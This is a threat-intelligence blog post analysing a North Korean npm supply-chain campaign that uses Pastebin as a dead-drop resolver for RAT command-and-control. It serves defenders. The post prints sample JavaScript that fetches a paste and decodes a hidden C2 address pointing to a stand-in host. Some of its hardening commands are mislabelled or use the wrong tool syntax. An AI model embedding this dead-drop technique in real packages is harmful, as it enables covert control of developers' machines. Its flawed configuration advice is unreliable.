North Korean npm Package Attack: Pastebin C2 RAT TTPs Analysis

Originally published on satyamrastogi.com

North Korean threat actors published 26 malicious npm packages masquerading as developer tools, using Pastebin content as dead drop resolvers for C2 communications in targeted supply chain attacks.

---

Executive Summary

North Korean threat actors have escalated their Contagious Interview campaign by publishing 26 malicious npm packages that masquerade as legitimate developer tools. These packages leverage Pastebin content as dead drop resolvers to establish command-and-control communications for cross-platform RAT deployment, representing a sophisticated supply chain attack vector targeting the JavaScript ecosystem.

Attack Vector Analysis

Reconnaissance Phase

The attackers begin by identifying high-value targets in the developer community, particularly those involved in cryptocurrency, blockchain, or financial technology projects. This aligns with North Korea's historical focus on financial gain through cyber operations.

The reconnaissance involves:

• Monitoring GitHub repositories and npm downloads for popular developer tools
• Identifying package naming patterns that developers commonly search for
• Analyzing legitimate package functionality to create convincing replicas

Initial Access via Supply Chain Compromise

The attack leverages T1195.002 Supply Chain Compromise: Compromise Software Supply Chain by poisoning the npm registry with malicious packages. Developers unknowingly install these packages through standard package management workflows.

Key techniques include:

• Typosquatting: Creating packages with names similar to popular tools
• Social engineering: Packaging appears as legitimate developer utilities
• Trusted platform abuse: Leveraging npm's reputation to bypass initial scrutiny

Dead Drop Resolver Mechanism

The most sophisticated aspect of this campaign involves using Pastebin as a dead drop resolver, implementing T1102.001 Web Service: Dead Drop Resolver. This technique provides several advantages:

1. Legitimate service abuse: Pastebin traffic appears normal to network monitoring
2. Dynamic C2 rotation: Attackers can update C2 endpoints without touching the malware
3. Steganographic concealment: C2 data hidden within seemingly innocuous paste content

The malicious packages contain code similar to:

const https = require('https');
const pasteId = 'xY3mK9qP'; // Embedded paste ID

function fetchC2Config() {
 const options = {
 hostname: 'pastebin.com',
 port: 443,
 path: `/raw/${pasteId}`,
 method: 'GET',
 headers: {
 'User-Agent': 'Mozilla/5.0 (compatible; npm/8.1.0)'
 }
 };

 https.request(options, (res) => {
 let data = '';
 res.on('data', chunk => data += chunk);
 res.on('end', () => extractC2(data));
 }).end();
}

function extractC2(pasteContent) {
 // Decode base64 hidden in "code comments"
 const pattern = /\/\* ([A-Za-z0-9+\/=]+) \*\//;
 const match = pasteContent.match(pattern);
 if (match) {
 const c2Config = Buffer.from(match[1], 'base64').toString();
 establishC2(JSON.parse(c2Config));
 }
}

Persistence and Execution

Once installed, the malicious packages implement T1543.003 Create or Modify System Process: Windows Service on Windows systems and equivalent techniques on Linux/macOS for persistence.

The RAT payload provides capabilities for:

• File system access via T1005 Data from Local System
• Screen capture using T1113 Screen Capture
• Keylogging through T1056.001 Input Capture: Keylogging
• Cryptocurrency wallet theft implementing T1005 Data from Local System

Technical Deep Dive

Package Masquerading Techniques

The 26 identified packages used various masquerading strategies:

1. Development tool spoofing:

   • webpack-dev-optimizer
   • babel-core-extended
   • eslint-config-standard-plus

2. Security tool mimicking:

   • npm-audit-enhanced
   • security-scanner-cli

3. Utility library imitation:

   • lodash-utils-extra
   • moment-timezone-extended

C2 Communication Protocol

The dead drop resolver mechanism works as follows:

# Example Pastebin content (appears innocuous)
# JavaScript utility functions

function calculateHash(input) {
 /* aHR0cHM6Ly9jMi5leGFtcGxlLmNvbTo4NDQz */
 return crypto.createHash('sha256').update(input).digest('hex');
}

# The base64 comment decodes to: https://c2.example.com:8443

This approach mirrors techniques we analyzed in our third-party software drift exploitation playbook, where attackers abuse trusted software distribution channels for initial access.

Cross-Platform RAT Capabilities

The deployed RAT includes platform-specific modules:

• Windows: PowerShell-based data collection
• Linux: Bash script execution and cron job installation
• macOS: Keychain access and application monitoring

This multi-platform approach aligns with the supply chain attack vectors we detailed in our Google Cloud API key exposure analysis, demonstrating how npm packages can compromise diverse development environments.

MITRE ATT&CK Mapping

• T1195.002 Supply Chain Compromise: Compromise Software Supply Chain
• T1102.001 Web Service: Dead Drop Resolver
• T1543.003 Create or Modify System Process: Windows Service
• T1005 Data from Local System
• T1113 Screen Capture
• T1056.001 Input Capture: Keylogging
• T1140 Deobfuscate/Decode Files or Information

Real-World Impact

This campaign represents a significant threat to organizations for several reasons:

1. Developer environment compromise: Workstations with privileged access to source code, production systems, and intellectual property
2. Cryptocurrency theft: Direct financial impact through wallet compromise
3. Supply chain propagation: Potential for malicious code to propagate into production applications
4. Intelligence gathering: Access to proprietary algorithms, business logic, and customer data

The financial technology sector faces particular risk, as demonstrated by the targeting patterns observed in this campaign and similar attacks we covered in our ransomware healthcare attack chain analysis.

Detection Strategies

Network Monitoring

• Monitor Pastebin.com requests from development environments
• Baseline normal npm package installation patterns
• Detect base64 encoded content in web requests
• Flag unusual outbound connections from developer workstations

Endpoint Detection

# Monitor npm install commands
auditd -w /usr/bin/npm -p x -k npm_execution

# Track package.json modifications 
inotifywait -m -e modify package.json

# Detect persistence mechanisms
ps aux | grep -E '(cron|service|daemon)' | grep -v grep

Code Analysis

Implement static analysis rules to detect:

• Base64 encoded strings in npm packages
• Pastebin API calls or URL patterns
• Obfuscated JavaScript execution
• Unusual network request patterns

Mitigation & Hardening

Immediate Actions

1. Package verification: Implement npm package integrity checking using npm audit signatures
2. Network segmentation: Isolate developer environments from production systems
3. Allowlist approach: Restrict package installations to pre-approved registries

Long-term Controls

Consistent with NIST Cybersecurity Framework guidelines:

1. Supply chain security: Implement package scanning in CI/CD pipelines
2. Zero trust architecture: Assume npm packages are potentially compromised
3. Behavioral monitoring: Deploy EDR solutions that detect post-installation activities

Configuration Hardening

# Restrict npm to internal registry only
npm config set registry https://internal-registry.company.com

# Enable package signature verification
npm config set audit-level high
npm config set fund false
npm config set update-notifier false

Follow CISA's software supply chain guidance for comprehensive protection strategies.

Key Takeaways

• North Korean threat actors continue evolving supply chain attack techniques, using legitimate services like Pastebin for C2 communication
• Dead drop resolvers provide resilient C2 infrastructure that's difficult to detect and disrupt
• Developer environments represent high-value targets requiring specialized security controls
• Package integrity verification and network segmentation are critical defensive measures
• Organizations must implement comprehensive supply chain security programs beyond traditional endpoint protection

Related Articles

• APT37 Air-Gapped Network Breach: USB-Based Attack Chain Analysis - Analysis of North Korean persistence techniques
• Pentagon AI Supply Chain Attack: Anthropic Designation Risk Analysis - Government supply chain threat vectors
• Third-Party Software Drift: Red Team Exploitation Playbook - Comprehensive supply chain attack methodology